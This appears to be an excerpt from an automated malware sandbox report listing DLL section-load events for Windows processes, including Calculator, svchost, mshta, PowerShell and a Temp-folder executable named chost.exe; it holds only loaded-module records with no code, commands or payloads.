Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: windows.ui.xaml.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: windows.applicationmodel.datatransfer.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: rometadata.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: windows.staterepositorycore.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: mrmcorer.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: windows.staterepositoryclient.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: bcp47mrm.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: windows.applicationmodel.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: uiamanager.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: windows.ui.core.textinput.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: windows.ui.immersive.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: windows.storage.applicationdata.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: windows.globalization.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: windows.globalization.fontgroups.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: fontgroupsoverride.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: windows.ui.xaml.controls.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: windows.energy.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: windows.graphics.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: winrttracing.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: windows.ui.xaml.phone.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: directmanipulation.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: profext.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: windows.web.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: photometadatahandler.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Section loaded: python3.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Section loaded: libffi-8.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Section loaded: sqlite3.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Section loaded: libcrypto-3.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Section loaded: libssl-3.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: textshaping.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
